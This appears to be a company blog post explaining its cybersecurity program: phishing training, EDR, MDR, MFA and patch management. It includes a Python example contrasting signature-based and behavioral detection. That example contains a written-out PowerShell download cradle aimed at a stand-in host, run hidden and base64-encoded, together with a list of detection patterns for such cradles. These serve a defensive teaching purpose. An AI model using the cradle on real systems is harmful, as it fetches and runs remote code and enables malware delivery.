When considering the cybersecurity challenges facing us all, we can and must work together to keep our data safe. Nobody can deny that it is a scary world out there, but that does not mean you have to give up. There are two paths toward calming our fears. One is to stick our heads in the sand and hope we are never hit with the kind of attack or breach that is commonly reported in the news. The other is to have an open dialogue that educates ourselves and our partners on how we can best protect ourselves.
Nothing is ever impenetrable; the city of Troy proved that. However, by taking the time to understand the threats, the methods of attack and the protections in place, we can better identify when something just does not look right. Time is critical once a threat becomes real, and the first question everyone asks is: what just happened? Identifying the source of a threat and how it entered the environment is crucial in the early stages of a cyber incident. Everyone should understand that threat actors are constantly trying to trick us, and they are very good at it. Their tricks arrive as emails, texts, phone calls and websites, and they exploit security holes in the systems we rely upon.
What To Do
How can a business protect itself? To start, everyone in the organization should be educated about the threat landscape. For small and mid-size organizations that can be a tough task, so it is worthwhile to invest in a third-party service that specializes in helping companies understand cyber threats and ways to protect themselves. For example, Tangible uses a service called KnowBe4 as part of our employee education program, which addresses the email attack vector.
KnowBe4 periodically sends simulated phishing emails that mimic real-world messages to test our employees' ability to identify and flag them. We can also flag real emails that look suspicious so they are evaluated before anyone acts on them. You would be amazed at how easy it is to fall for these messages. One of the most interesting observations since we started using the service is that it has prompted more discussion among our staff, which is encouraging and sometimes funny. There is no shame in being tricked, and once we all realized that, we began working together proactively to flag potential threats.
Of course, as a company that handles third-party data, we have an obligation to protect our customers' data. Our approach to data security has many facets, but we primarily focus on Endpoint Detection and Response (EDR), Managed Detection and Response (MDR), Multi-Factor Authentication (MFA), patch management and a well-trained staff. Each of these elements plays an important role, and none of them works without the others: a chain is only as strong as its weakest link.
Endpoint Detection and Response
Many people are familiar with endpoint protection products, although the names vary: anti-virus, next-generation anti-virus, EDR and others. A firewall is a different kind of control; it filters network traffic rather than watching what runs on the endpoint. Microsoft Defender and Norton Anti-Virus are the examples most people know. At Tangible, we invested in a product called SentinelOne Complete, an enterprise-class product that we have installed on every endpoint within our environment. The software not only provides traditional AV protections but extends into machine learning and behavioral analysis, along with active threat hunting within our environment. Those are a lot of fancy words, but the point is simple: threats have become so sophisticated that static detection methods, such as matching a file against a list of known-bad signatures, are no longer enough on their own. What is needed is quick analysis of whether a process's behavior or pattern of activity is potentially dangerous, and the outcome of an attack can be changed by how quickly that behavior is identified and the offending process is flagged and stopped. All of this happens within a matter of milliseconds. We entrusted our systems to SentinelOne based on our own research, industry and peer recommendations, and finally thoughtful engagement with them as a company.
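To make the static-versus-behavioral distinction concrete, here is an added example (not SentinelOne's code, nor anything Tangible runs) that applies both kinds of check to a few constructed process-creation events. The file contents, hashes, process names and command lines are all made up for illustration; a real EDR agent sees far richer telemetry than this.

```python
"""
Added example: a signature-style (hash) detector next to a behavioral
detector, run over constructed endpoint process-creation events.
Nothing here is SentinelOne's logic; the events and binaries are invented.
"""
import base64
import hashlib
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent: str        # image name of the parent process
    image: str         # image name of the new process
    cmdline: str       # full command line of the new process
    file_bytes: bytes  # contents of the executable on disk (constructed)


OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed "known malware": the static detector knows only this exact file.
KNOWN_MALWARE = b"MZ...constructed dropper build 1"
KNOWN_BAD_HASHES = {hashlib.sha256(KNOWN_MALWARE).hexdigest()}

# Fragments that commonly appear in PowerShell download cradles.
SUSPICIOUS_FRAGMENTS = ("downloadstring", "invoke-expression", "iex ",
                        "invoke-webrequest", "frombase64string")


def static_detect(ev: ProcessEvent) -> bool:
    """Old-style check: is the file's hash on the denylist?"""
    return hashlib.sha256(ev.file_bytes).hexdigest() in KNOWN_BAD_HASHES


def decode_encoded_command(cmdline: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of UTF-16LE text.
    Return the decoded script, or '' if there is none or it is malformed."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-enc", "-encodedcommand", "-ec", "-e"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""


def behavioral_detect(ev: ProcessEvent) -> list[str]:
    """Behavioral check: what the process does, not which bytes it is."""
    reasons = []
    if ev.parent.lower() in OFFICE_APPS and ev.image.lower() in SCRIPT_HOSTS:
        reasons.append("office-app-spawned-script-host")
    decoded = decode_encoded_command(ev.cmdline)
    if decoded:
        reasons.append("encoded-powershell")
        if any(f in decoded.lower() for f in SUSPICIOUS_FRAGMENTS):
            reasons.append("download-cradle")
    return reasons


def verdict(ev: ProcessEvent) -> str:
    """Combine both signals: 'block', 'suspicious' (for an analyst) or 'clean'."""
    reasons = behavioral_detect(ev)
    if static_detect(ev):
        return "block"
    if "office-app-spawned-script-host" in reasons or "download-cradle" in reasons:
        return "block"
    if reasons:
        return "suspicious"
    return "clean"


def build_events() -> list[ProcessEvent]:
    """Constructed sample telemetry (not captured from any real system)."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    encoded_cradle = base64.b64encode(cradle.encode("utf-16-le")).decode()
    encoded_benign = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
    legit_ps = b"MZ...constructed stand-in for the signed powershell.exe"
    return [
        # 1. The one dropper build the denylist already knows about.
        ProcessEvent("explorer.exe", "dropper.exe", "dropper.exe", KNOWN_MALWARE),
        # 2. Macro in a Word document launches hidden, encoded PowerShell that
        #    fetches a second stage. The binary is the legitimate powershell.exe,
        #    so no hash check can catch it; only the behavior gives it away.
        ProcessEvent("winword.exe", "powershell.exe",
                     f"powershell.exe -nop -w hidden -enc {encoded_cradle}", legit_ps),
        # 3. An administrator running an ordinary command.
        ProcessEvent("explorer.exe", "powershell.exe",
                     "powershell.exe Get-ChildItem C:\\Users", legit_ps),
        # 4. Encoded but harmless: one weak signal, worth a look, not a block.
        ProcessEvent("explorer.exe", "powershell.exe",
                     f"powershell.exe -enc {encoded_benign}", legit_ps),
    ]


if __name__ == "__main__":
    for ev in build_events():
        print(f"{ev.parent} -> {ev.image}: static={static_detect(ev)} "
              f"behavioral={behavioral_detect(ev)} verdict={verdict(ev)}")
```

The hash check only catches the copy it already knows, while the behavioral rule catches the "Word spawns encoded PowerShell that downloads something" pattern no matter which binary the attacker ships or how it is renamed, because it keys on what the process does rather than what it is. The fourth event shows the other side: a single weak signal is not a verdict, and that kind of alert is what an MDR analyst adjudicates.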
Managed Detection and Response
Managed Detection and Response (MDR) is a critical and sometimes unattainable goal for many organizations. MDR is typically layered on top of your EDR solution and monitors and protects your systems 24x7x365, responding to a potential security incident with knowledge, precision and timeliness. That is a lot to handle on your own, considering most of us sleep, enjoy time with family and have other responsibilities within our organizations. Tangible engaged an MDR service because it made sense, and because not doing so would put a tremendous burden on our technical team. A managed detection and response service became necessary so that we could go to bed at night with a clear head, a safe environment and the knowledge that we are doing right by our customers. So what does Tangible's MDR service actually do? It is an always-on service that monitors the alerts raised by our EDR software (SentinelOne).
If an alert or suspicious activity is identified, the MDR service responds immediately and either clears the alert as benign or takes action to contain the threat. Trained security analysts can quickly determine whether an event is benign or of serious concern. They also have a clearly defined escalation path to engage their own staff and to notify us so that we can mobilize. You may recall the term "threat hunting" from above. This is a powerful component of MDR, because an MDR provider may monitor thousands of environments: when they identify an attack on any one customer, they can apply that knowledge to every environment they monitor. Couple this with active monitoring of the dark web and other intelligence reports and you will see how powerful this can be. Our MDR service is provided by SentinelOne Vigilance. We invite you to check out their year-end report on cybersecurity; it is a detailed document, and you will appreciate the depth of the activity, both good and bad, going on daily. With our EDR and MDR solutions in place, Tangible has taken a very substantial step toward confronting the threats that exist.
Another critical cybersecurity element, Multi-Factor Authentication (MFA), is now all but mandatory for any online system that handles sensitive data. Widely cited industry statistics attribute as many as 90% of attacks to compromised usernames and passwords, and MFA, if understood and used correctly, could stop most of those. Those of you who use our hosting environment have been introduced to Cisco Duo, the product we use for MFA. We have found it flexible, reliable and easy to use. It also gives us much tighter control by showing us access attempts from foreign countries or unauthorized devices so that they can be blocked. Bear in mind that the bad guys are always trying to trick us into approving access: an attacker who already has your password may send you repeated push prompts hoping you will tap "Approve" just to make them stop (often called MFA fatigue). Protect your username and password, and only acknowledge a request for access when you yourself initiated it; if you receive a prompt you did not request, deny it and report it, because it means someone else already has your password. Some of you may share usernames and access with colleagues. We won't pass judgment on that, but we encourage you to think about how dramatically it increases your vulnerability footprint: a shared credential cannot be tied to one person's second factor, and it makes it impossible to tell who actually performed an action.
Patch management seems simple in concept, but it can be really difficult to stay on top of for various reasons. Tangible Solutions follows the rhythm of Microsoft's Patch Tuesday: on the second Tuesday of each month, Microsoft releases new patches for all supported product versions. These patches include some functional enhancements, but the ones every IT professional watches are the fixes for Common Vulnerabilities and Exposures (CVEs). A CVE is a publicly catalogued vulnerability; some of them are already being actively exploited by the time the patch ships, and leaving them unaddressed can have terrible consequences. Tangible Solutions uses a product called Patch Manager Plus (PMP) to patch our servers. Each Patch Tuesday we follow a consistent pattern: test the patches on a small subset of servers first, then roll them out to the rest. It takes time and patience to get through them all, and we usually finish just in time to start the process again. PMP manages patches not only for Microsoft Windows components but also for many other third-party products used within our cloud environment. Besides the servers, we also manage routers, switches, firewalls, access gateways and many other devices. It is a long, tedious process with its challenges, but thanks to a talented staff, we do our very best to keep things as current as possible.
The Client Side
Up to now, we have focused on what Tangible is doing to help protect your data, and you may wonder what you should do with this information. First, familiarize yourself with the terms used above; they are well known in the IT landscape. Second, we hope this information makes you more comfortable knowing how much attention Tangible Solutions pays to these threats. Next, make an honest assessment of how well your organization is approaching cyber threats. The actions you take today protect not only you but also everyone else in your organization and work community.
Have a discussion with your IT team and understand their approach to cybersecurity and the tools they use at your office. Hopefully there is synergy between what we are doing and what they are doing. If you discover that you do not have the proper protections in place, don't feel bad or discouraged; get to work. Start by talking with cybersecurity professionals and coming up with a plan. It takes time to develop a healthy and secure cybersecurity posture, and we are happy to help in any way we can. There is no one-size-fits-all approach, so it takes some collaboration to identify the best model for your needs. Taking these steps does not make us invincible, but it makes us knowledgeable, and knowing that we are working together as a team allows us to react and calmly navigate the turbulent waters.
If you need help or guidance, please contact the Tangible team.